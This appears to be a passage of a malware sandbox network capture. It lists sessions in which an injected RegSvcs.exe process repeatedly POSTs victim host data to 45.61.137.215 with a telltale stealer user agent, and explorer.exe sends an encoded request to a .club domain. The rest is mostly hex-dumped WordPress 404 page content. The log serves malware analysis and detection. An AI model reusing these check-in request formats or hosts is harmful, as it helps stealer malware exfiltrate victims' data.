May 29, 2024 15:43:25.290640116 CEST	1236	IN	Data Raw: 2d 63 6f 6c 6f 72 2d 2d 70 61 6c 65 2d 70 69 6e 6b 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 76 69 76 69 64 2d 72 65 64 2d 63 6f 6c 6f 72 7b 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 Data Ascii: -color--pale-pink) !important;}.has-vivid-red-color{color: var(--wp--preset--color--vivid-red) !important;}.has-luminous-vivid-orange-color{color: var(--wp--preset--color--luminous-vivid-orange) !important;}.has-luminous-vivid-amber-color{colo
May 29, 2024 15:43:25.290649891 CEST	224	IN	Data Raw: 6d 69 6e 6f 75 73 2d 76 69 76 69 64 2d 6f 72 61 6e 67 65 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 6c 75 Data Ascii: minous-vivid-orange-background-color{background-color: var(--wp--preset--color--luminous-vivid-orange) !important;}.has-luminous-vivid-amber-background-color{background-color: var(--wp--preset--color--luminous-vivid-amber) !

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
28	192.168.2.9	49743	45.61.137.215	80	7532	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
May 29, 2024 15:43:25.482919931 CEST	246	OUT	POST /index.php/3b1tenbkyj HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 45.61.137.215 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: DCC85916 Content-Length: 145 Connection: close
May 29, 2024 15:43:25.490550041 CEST	145	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 35 00 32 00 38 00 31 00 31 00 30 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01 Data Ascii: (ckav.rutina528110TINA-PC0FDD42EE188E931437F4FBE2C
May 29, 2024 15:43:28.043178082 CEST	1236	IN	HTTP/1.0 404 Not Found Date: Wed, 29 May 2024 13:43:26 GMT Server: Apache/2.4.52 (Ubuntu) Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Link: <http://45.61.137.215/index.php/wp-json/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 09 3c 68 65 61 64 3e 0d 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 09 09 0d 0a 09 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 73 65 70 61 72 61 74 65 64 20 70 61 70 65 72 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="profile" href="https://gmpg.org/xfn/11"><title>Page not found – separated paper</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="separated paper » Feed" href="http://45.61.137.215/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="separated paper » Comments Feed" href="http://45.61.137.215/index.php/comments/feed/" /><script type="text/javascript">/* <![CDATA[ */window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concate
May 29, 2024 15:43:28.043205023 CEST	1236	IN	Data Raw: 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 34 35 2e 36 31 2e 31 33 37 2e 32 31 35 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 35 2e 33 22 Data Ascii: moji":"http:\/\/45.61.137.215\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.3"}};/! This file is auto-generated /!function(i,n){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,
May 29, 2024 15:43:28.043215990 CEST	448	IN	Data Raw: 65 6e 43 61 6e 76 61 73 28 33 30 30 2c 31 35 30 29 3a 69 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 63 61 6e 76 61 73 22 29 2c 61 3d 72 2e 67 65 74 43 6f 6e 74 65 78 74 28 22 32 64 22 2c 7b 77 69 6c 6c 52 65 61 64 46 72 65 71 75 65 6e 74 6c Data Ascii: enCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadFrequently:!0}),o=(a.textBaseline="top",a.font="600 32px Arial",{});return e.forEach(function(e){o[e]=t(a,e,n)}),o}function t(e){var t=i.createElement("script");t.src=e,t
May 29, 2024 15:43:28.043226004 CEST	1236	IN	Data Raw: 22 44 4f 4d 43 6f 6e 74 65 6e 74 4c 6f 61 64 65 64 22 2c 65 2c 7b 6f 6e 63 65 3a 21 30 7d 29 7d 29 2c 6e 65 77 20 50 72 6f 6d 69 73 65 28 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 6e 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 74 72 79 7b 76 61 72 Data Ascii: "DOMContentLoaded",e,{once:!0})}),new Promise(function(t){var n=function(){try{var e=JSON.parse(sessionStorage.getItem(o));if("object"==typeof e&&"number"==typeof e.timestamp&&(new Date).valueOf()<e.timestamp+604800&&"object"==typeof e.support
May 29, 2024 15:43:28.043237925 CEST	1236	IN	Data Raw: 70 65 6d 6f 6a 69 26 26 65 2e 74 77 65 6d 6f 6a 69 26 26 28 74 28 65 2e 74 77 65 6d 6f 6a 69 29 2c 74 28 65 2e 77 70 65 6d 6f 6a 69 29 29 29 7d 29 29 7d 28 28 77 69 6e 64 6f 77 2c 64 6f 63 75 6d 65 6e 74 29 2c 77 69 6e 64 6f 77 2e 5f 77 70 65 6d Data Ascii: pemoji&&e.twemoji&&(t(e.twemoji),t(e.wpemoji)))}))}((window,document),window._wpemojiSettings);/* ... */</script><style id='wp-emoji-styles-inline-css' type='text/css'>img.wp-smiley, img.emoji {display: inline !important;border: no
May 29, 2024 15:43:28.043246031 CEST	448	IN	Data Raw: 2d 63 6f 6c 6f 72 2d 2d 76 69 76 69 64 2d 72 65 64 3a 20 23 63 66 32 65 32 65 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 6c 75 6d 69 6e 6f 75 73 2d 76 69 76 69 64 2d 6f 72 61 6e 67 65 3a 20 23 66 66 36 39 30 30 3b 2d 2d 77 Data Ascii: -color--vivid-red: #cf2e2e;--wp--preset--color--luminous-vivid-orange: #ff6900;--wp--preset--color--luminous-vivid-amber: #fcb900;--wp--preset--color--light-green-cyan: #7bdcb5;--wp--preset--color--vivid-green-cyan: #00d084;--wp--preset--color
May 29, 2024 15:43:28.043256998 CEST	1236	IN	Data Raw: 2c 32 32 37 2c 31 29 20 30 25 2c 72 67 62 28 31 35 35 2c 38 31 2c 32 32 34 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 6c 69 67 68 74 2d 67 72 65 65 6e 2d 63 79 61 6e 2d 74 6f 2d 76 69 76 69 64 Data Ascii: ,227,1) 0%,rgb(155,81,224) 100%);--wp--preset--gradient--light-green-cyan-to-vivid-green-cyan: linear-gradient(135deg,rgb(122,220,180) 0%,rgb(0,208,130) 100%);--wp--preset--gradient--luminous-vivid-amber-to-luminous-vivid-orange: linear-gradie
May 29, 2024 15:43:28.043267012 CEST	1236	IN	Data Raw: 64 69 65 6e 74 2d 2d 65 6c 65 63 74 72 69 63 2d 67 72 61 73 73 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 32 30 32 2c 32 34 38 2c 31 32 38 29 20 30 25 2c 72 67 62 28 31 31 33 2c 32 30 36 2c 31 32 36 29 Data Ascii: dient--electric-grass: linear-gradient(135deg,rgb(202,248,128) 0%,rgb(113,206,126) 100%);--wp--preset--gradient--midnight: linear-gradient(135deg,rgb(2,3,129) 0%,rgb(40,116,252) 100%);--wp--preset--font-size--small: 13px;--wp--preset--font-siz
May 29, 2024 15:43:28.043277979 CEST	448	IN	Data Raw: 20 32 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 67 72 69 64 29 7b 67 61 70 3a 20 32 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 70 6f 73 74 2d 74 65 6d Data Ascii: 2em;}:where(.wp-block-columns.is-layout-grid){gap: 2em;}:where(.wp-block-post-template.is-layout-flex){gap: 1.25em;}:where(.wp-block-post-template.is-layout-grid){gap: 1.25em;}.has-black-color{color: var(--wp--preset--color--black) !important
May 29, 2024 15:43:28.043410063 CEST	1236	IN	Data Raw: 2d 63 6f 6c 6f 72 2d 2d 70 61 6c 65 2d 70 69 6e 6b 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 76 69 76 69 64 2d 72 65 64 2d 63 6f 6c 6f 72 7b 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 Data Ascii: -color--pale-pink) !important;}.has-vivid-red-color{color: var(--wp--preset--color--vivid-red) !important;}.has-luminous-vivid-orange-color{color: var(--wp--preset--color--luminous-vivid-orange) !important;}.has-luminous-vivid-amber-color{colo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
29	192.168.2.9	49744	103.224.212.213	80	3504	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
May 29, 2024 15:43:27.019236088 CEST	171	OUT	GET /dn03/?KvOx3=rTguiTyPWe+LQ3wbOsvLrlRt5HkRD6mO+8zHcQ1TTPZ93ZKF8Svri6qQbYlnCi86X6wl&LhEx=ODKXZDVpY2w8gpmp HTTP/1.1 Host: www.vivaness.club Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
30	192.168.2.9	49745	45.61.137.215	80	7532	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
May 29, 2024 15:43:28.214472055 CEST	246	OUT	POST /index.php/3b1tenbkyj HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 45.61.137.215 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: DCC85916 Content-Length: 145 Connection: close
May 29, 2024 15:43:28.219433069 CEST	145	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 35 00 32 00 38 00 31 00 31 00 30 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01 Data Ascii: (ckav.rutina528110TINA-PC0FDD42EE188E931437F4FBE2C
May 29, 2024 15:43:30.643383026 CEST	1236	IN	HTTP/1.0 404 Not Found Date: Wed, 29 May 2024 13:43:28 GMT Server: Apache/2.4.52 (Ubuntu) Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Link: <http://45.61.137.215/index.php/wp-json/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 09 3c 68 65 61 64 3e 0d 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 09 09 0d 0a 09 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 73 65 70 61 72 61 74 65 64 20 70 61 70 65 72 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="profile" href="https://gmpg.org/xfn/11"><title>Page not found – separated paper</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="separated paper » Feed" href="http://45.61.137.215/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="separated paper » Comments Feed" href="http://45.61.137.215/index.php/comments/feed/" /><script type="text/javascript">/* <![CDATA[ */window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concate
May 29, 2024 15:43:30.643404007 CEST	1236	IN	Data Raw: 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 34 35 2e 36 31 2e 31 33 37 2e 32 31 35 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 35 2e 33 22 Data Ascii: moji":"http:\/\/45.61.137.215\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.3"}};/! This file is auto-generated /!function(i,n){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,
May 29, 2024 15:43:30.643414974 CEST	1236	IN	Data Raw: 65 6e 43 61 6e 76 61 73 28 33 30 30 2c 31 35 30 29 3a 69 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 63 61 6e 76 61 73 22 29 2c 61 3d 72 2e 67 65 74 43 6f 6e 74 65 78 74 28 22 32 64 22 2c 7b 77 69 6c 6c 52 65 61 64 46 72 65 71 75 65 6e 74 6c Data Ascii: enCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadFrequently:!0}),o=(a.textBaseline="top",a.font="600 32px Arial",{});return e.forEach(function(e){o[e]=t(a,e,n)}),o}function t(e){var t=i.createElement("script");t.src=e,t
May 29, 2024 15:43:30.643425941 CEST	1236	IN	Data Raw: 75 70 70 6f 72 74 73 5b 74 5d 3d 65 5b 74 5d 2c 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 3d 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 26 26 6e 2e 73 75 70 70 6f 72 74 73 5b 74 5d 2c 22 66 6c 61 67 22 21 Data Ascii: upports[t]=e[t],n.supports.everything=n.supports.everything&&n.supports[t],"flag"!==t&&(n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&n.supports[t]);n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&!n.support
May 29, 2024 15:43:30.643436909 CEST	1236	IN	Data Raw: 72 3a 23 33 32 33 37 33 63 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 39 39 39 39 70 78 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 6e 6f 6e 65 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 3a 63 61 6c 63 28 2e Data Ascii: r:#32373c;border-radius:9999px;box-shadow:none;text-decoration:none;padding:calc(.667em + 2px) calc(1.333em + 2px);font-size:1.125em}.wp-block-file__button{background:#32373c;color:#fff;text-decoration:none}</style><style id='global-styles-i
May 29, 2024 15:43:30.643448114 CEST	1236	IN	Data Raw: 6e 67 65 2d 74 6f 2d 76 69 76 69 64 2d 72 65 64 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 61 28 32 35 35 2c 31 30 35 2c 30 2c 31 29 20 30 25 2c 72 67 62 28 32 30 37 2c 34 36 2c 34 36 29 20 31 30 30 25 29 Data Ascii: nge-to-vivid-red: linear-gradient(135deg,rgba(255,105,0,1) 0%,rgb(207,46,46) 100%);--wp--preset--gradient--very-light-gray-to-cyan-bluish-gray: linear-gradient(135deg,rgb(238,238,238) 0%,rgb(169,184,195) 100%);--wp--preset--gradient--cool-to-w
May 29, 2024 15:43:30.643461943 CEST	1236	IN	Data Raw: 2d 70 72 65 73 65 74 2d 2d 73 70 61 63 69 6e 67 2d 2d 32 30 3a 20 30 2e 34 34 72 65 6d 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 73 70 61 63 69 6e 67 2d 2d 33 30 3a 20 30 2e 36 37 72 65 6d 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 73 70 61 Data Ascii: -preset--spacing--20: 0.44rem;--wp--preset--spacing--30: 0.67rem;--wp--preset--spacing--40: 1rem;--wp--preset--spacing--50: 1.5rem;--wp--preset--spacing--60: 2.25rem;--wp--preset--spacing--70: 3.38rem;--wp--preset--spacing--80: 5.06rem;--wp--p
May 29, 2024 15:43:30.643471956 CEST	108	IN	Data Raw: 77 68 69 74 65 2d 63 6f 6c 6f 72 7b 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 77 68 69 74 65 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 70 61 6c 65 2d 70 69 6e 6b 2d 63 6f 6c 6f Data Ascii: white-color{color: var(--wp--preset--color--white) !important;}.has-pale-pink-color{color: var(--wp--preset-
May 29, 2024 15:43:30.643481970 CEST	1236	IN	Data Raw: 2d 63 6f 6c 6f 72 2d 2d 70 61 6c 65 2d 70 69 6e 6b 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 76 69 76 69 64 2d 72 65 64 2d 63 6f 6c 6f 72 7b 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 Data Ascii: -color--pale-pink) !important;}.has-vivid-red-color{color: var(--wp--preset--color--vivid-red) !important;}.has-luminous-vivid-orange-color{color: var(--wp--preset--color--luminous-vivid-orange) !important;}.has-luminous-vivid-amber-color{colo
May 29, 2024 15:43:30.643495083 CEST	1236	IN	Data Raw: 6d 69 6e 6f 75 73 2d 76 69 76 69 64 2d 6f 72 61 6e 67 65 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 6c 75 Data Ascii: minous-vivid-orange-background-color{background-color: var(--wp--preset--color--luminous-vivid-orange) !important;}.has-luminous-vivid-amber-background-color{background-color: var(--wp--preset--color--luminous-vivid-amber) !important;}.has-lig

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
31	192.168.2.9	49746	45.61.137.215	80	7532	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
May 29, 2024 15:43:30.801731110 CEST	246	OUT	POST /index.php/3b1tenbkyj HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 45.61.137.215 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: DCC85916 Content-Length: 145 Connection: close
May 29, 2024 15:43:30.806689024 CEST	145	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 35 00 32 00 38 00 31 00 31 00 30 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01 Data Ascii: (ckav.rutina528110TINA-PC0FDD42EE188E931437F4FBE2C
May 29, 2024 15:43:33.221050024 CEST	1236	IN	HTTP/1.0 404 Not Found Date: Wed, 29 May 2024 13:43:31 GMT Server: Apache/2.4.52 (Ubuntu) Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Link: <http://45.61.137.215/index.php/wp-json/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 09 3c 68 65 61 64 3e 0d 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 09 09 0d 0a 09 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 73 65 70 61 72 61 74 65 64 20 70 61 70 65 72 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="profile" href="https://gmpg.org/xfn/11"><title>Page not found – separated paper</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="separated paper » Feed" href="http://45.61.137.215/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="separated paper » Comments Feed" href="http://45.61.137.215/index.php/comments/feed/" /><script type="text/javascript">/* <![CDATA[ */window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concate
May 29, 2024 15:43:33.221077919 CEST	1236	IN	Data Raw: 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 34 35 2e 36 31 2e 31 33 37 2e 32 31 35 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 35 2e 33 22 Data Ascii: moji":"http:\/\/45.61.137.215\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.3"}};/! This file is auto-generated /!function(i,n){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,
May 29, 2024 15:43:33.221088886 CEST	1236	IN	Data Raw: 65 6e 43 61 6e 76 61 73 28 33 30 30 2c 31 35 30 29 3a 69 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 63 61 6e 76 61 73 22 29 2c 61 3d 72 2e 67 65 74 43 6f 6e 74 65 78 74 28 22 32 64 22 2c 7b 77 69 6c 6c 52 65 61 64 46 72 65 71 75 65 6e 74 6c Data Ascii: enCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadFrequently:!0}),o=(a.textBaseline="top",a.font="600 32px Arial",{});return e.forEach(function(e){o[e]=t(a,e,n)}),o}function t(e){var t=i.createElement("script");t.src=e,t
May 29, 2024 15:43:33.221101046 CEST	1236	IN	Data Raw: 75 70 70 6f 72 74 73 5b 74 5d 3d 65 5b 74 5d 2c 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 3d 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 26 26 6e 2e 73 75 70 70 6f 72 74 73 5b 74 5d 2c 22 66 6c 61 67 22 21 Data Ascii: upports[t]=e[t],n.supports.everything=n.supports.everything&&n.supports[t],"flag"!==t&&(n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&n.supports[t]);n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&!n.support
May 29, 2024 15:43:33.221112967 CEST	896	IN	Data Raw: 72 3a 23 33 32 33 37 33 63 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 39 39 39 39 70 78 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 6e 6f 6e 65 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 3a 63 61 6c 63 28 2e Data Ascii: r:#32373c;border-radius:9999px;box-shadow:none;text-decoration:none;padding:calc(.667em + 2px) calc(1.333em + 2px);font-size:1.125em}.wp-block-file__button{background:#32373c;color:#fff;text-decoration:none}</style><style id='global-styles-i
May 29, 2024 15:43:33.221251011 CEST	1236	IN	Data Raw: 2c 32 32 37 2c 31 29 20 30 25 2c 72 67 62 28 31 35 35 2c 38 31 2c 32 32 34 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 6c 69 67 68 74 2d 67 72 65 65 6e 2d 63 79 61 6e 2d 74 6f 2d 76 69 76 69 64 Data Ascii: ,227,1) 0%,rgb(155,81,224) 100%);--wp--preset--gradient--light-green-cyan-to-vivid-green-cyan: linear-gradient(135deg,rgb(122,220,180) 0%,rgb(0,208,130) 100%);--wp--preset--gradient--luminous-vivid-amber-to-luminous-vivid-orange: linear-gradie
